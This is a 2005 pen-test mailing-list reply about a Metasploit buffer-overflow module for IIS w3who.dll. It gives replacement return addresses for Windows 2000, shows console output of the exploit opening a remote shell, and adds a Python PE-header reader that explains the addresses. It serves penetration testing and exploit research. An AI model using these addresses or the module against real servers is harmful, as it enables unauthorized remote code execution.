Re: question regarding w3who.dll bug

From: H D Moore (sflist_at_digitaloffense.net)
Date: 01/15/05

    To: pen-test@securityfocus.com
    Date: Sat, 15 Jan 2005 01:56:01 -0600

    The return address for Windows 2000 fails because the ImageBase for the
    DLL is different. I forgot to check the base address on 2000 after fixing
    the code to work on Windows XP SP2 :-(

    A new module will be posted to metasploit.com shortly. In the meantime,
    just change the return address in the Targets section to one of the
    following:

    0x01169f4a (pop eax, pop ebp, ret @w3who.dll w/base 0x01150000)
    0x75022ac4 (pop esi, pop ebx, ret @ws2help.dll [Win2k English])
    0x750236b1 (pop esi, pop ebx, ret @ws2help.dll [Win2k English])

    If you run into any other bugs or reliability problems with the Metasploit
    Framework, *please* drop us an email at msfdev[at]metasploit.com :-)

    -HD

    ---
    msf iis_w3who_overflow(win32_bind) > exploit
    [*] Starting Bind Handler.
    [*] Attempting to exploit target Windows 2000 RESKIT DLL (Win2000)
    [*] Sending 8254 bytes to remote host.
    [*] Waiting for a response...
    [*] Got connection from 192.168.0.100:34885 <-> 192.168.0.237:4444
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-1999 Microsoft Corp.
    C:\WINNT\system32>

    On Friday 14 January 2005 02:49, Martin Bernhard wrote:
    > Hi,
    >
    > As one of our clients is running some IIS web servers with w3who.dll on
    > them, I figured that this would be a good place to start our pen test.
    > Unfortunately, the exploit in the new release of the Metasploit
    > Framework did not work on the most important servers (Windows 2000). I
    > have access to a test system that gives me the opportunity to analyze
    > the bug in detail, but I can’t figure out what parts in memory are
    > overwritten. Does anybody know what exactly I have to do to trigger the
    > bug and analyze it (I’m using ollydbg)?
    >
    > Any help is much appreciated
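
Added example (not part of HD's reply or of the Metasploit module): a small Python PE-header reader that pulls ImageBase out of a DLL, plus the arithmetic behind the addresses above. A gadget address is ImageBase plus a build-specific RVA, so the same w3who.dll build mapped at a different base needs a different address, which is exactly why the XP address fails on 2000. The header stub is constructed sample data, not a real DLL.

```python
import struct

def pe_image_base(data: bytes) -> int:
    """Return the ImageBase field of a PE32 or PE32+ image (raw file bytes)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    opt = e_lfanew + 4 + 20          # skip signature and COFF file header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:               # PE32: 4-byte ImageBase at offset 28
        return struct.unpack_from("<I", data, opt + 28)[0]
    if magic == 0x20B:               # PE32+: 8-byte ImageBase at offset 24
        return struct.unpack_from("<Q", data, opt + 24)[0]
    raise ValueError("unknown optional header magic 0x%x" % magic)

def gadget_rva(address: int, image_base: int) -> int:
    """Offset of an address inside the image; constant across loads of one build."""
    if address < image_base:
        raise ValueError("address lies below the image base")
    return address - image_base

def rebase(address: int, old_base: int, new_base: int) -> int:
    """Same build, different ImageBase: keep the RVA, swap the base."""
    return new_base + gadget_rva(address, old_base)

def build_stub(image_base: int, pe32plus: bool = False) -> bytes:
    """Constructed minimal PE header used only to exercise pe_image_base()."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)   # e_lfanew -> 0x40
    coff = b"\0" * 20
    if pe32plus:
        opt = struct.pack("<H", 0x20B) + b"\0" * 22 + struct.pack("<Q", image_base)
    else:
        opt = struct.pack("<H", 0x10B) + b"\0" * 26 + struct.pack("<I", image_base)
    return dos + b"PE\0\0" + coff + opt

if __name__ == "__main__":
    # The w3who.dll figures from the post: 0x01169f4a with base 0x01150000.
    stub = build_stub(0x01150000)
    base = pe_image_base(stub)
    print("ImageBase from header: 0x%08x" % base)
    print("gadget RVA: 0x%x" % gadget_rva(0x01169f4a, base))
    # To check a real file: pe_image_base(open(path, "rb").read())
```

Compare the ImageBase reported for the DLL actually installed on the host against the base the module assumes; if they differ, the hard-coded address cannot be right for that system.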
    
